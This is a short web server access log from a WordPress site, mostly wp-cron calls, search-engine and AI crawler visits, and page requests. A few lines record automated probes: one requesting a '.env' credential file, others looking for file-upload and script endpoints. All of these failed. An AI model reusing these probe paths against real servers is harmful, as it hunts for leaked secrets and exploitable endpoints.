43.157.148.38 - - [05/Feb/2026:20:09:10 +0800] "GET / HTTP/1.1" 200 34753 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [05/Feb/2026:20:24:13 +0800] "POST /wp-cron.php?doing_wp_cron=1770294253.6445090770721435546875 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
45.194.92.11 - - [05/Feb/2026:20:24:13 +0800] "GET /dispatch.asp HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [05/Feb/2026:20:30:55 +0800] "POST /wp-cron.php?doing_wp_cron=1770294655.4651679992675781250000 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
36.133.108.125 - - [05/Feb/2026:20:30:55 +0800] "HEAD /test/fixtures/node_path/.env HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
36.133.115.36 - - [05/Feb/2026:20:40:54 +0800] "POST /wp-cron.php?doing_wp_cron=1770295254.9160189628601074218750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
66.249.74.7 - - [05/Feb/2026:20:40:54 +0800] "GET /media/4/ HTTP/1.1" 200 26005 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.7559.109 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [05/Feb/2026:20:50:25 +0800] "POST /wp-cron.php?doing_wp_cron=1770295825.3727889060974121093750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
43.130.106.18 - - [05/Feb/2026:20:50:25 +0800] "GET / HTTP/1.1" 200 34753 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
40.77.167.67 - - [05/Feb/2026:20:51:36 +0800] "GET /2163/ HTTP/1.1" 200 23704 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
120.77.183.184 - - [05/Feb/2026:21:03:32 +0800] "GET /public/web/server/preview.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
120.77.183.184 - - [05/Feb/2026:21:03:32 +0800] "GET /public/web/server/fileupload.php HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
36.133.115.36 - - [05/Feb/2026:21:04:05 +0800] "POST /wp-cron.php?doing_wp_cron=1770296645.8736429214477539062500 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
87.121.84.51 - - [05/Feb/2026:21:04:05 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
36.133.115.36 - - [05/Feb/2026:21:23:39 +0800] "POST /wp-cron.php?doing_wp_cron=1770297819.7962889671325683593750 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
74.7.241.18 - - [05/Feb/2026:21:23:39 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.175.191 - - [05/Feb/2026:21:23:41 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
117.188.50.63 - - [05/Feb/2026:21:32:54 +0800] "GET /2162/ HTTP/1.1" 200 25059 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
36.133.115.36 - - [05/Feb/2026:21:50:55 +0800] "POST /wp-cron.php?doing_wp_cron=1770299455.1332929134368896484375 HTTP/1.1" 200 31 "-" "WordPress/6.9; http://cqqizhou.com"
198.244.168.206 - - [05/Feb/2026:21:50:55 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
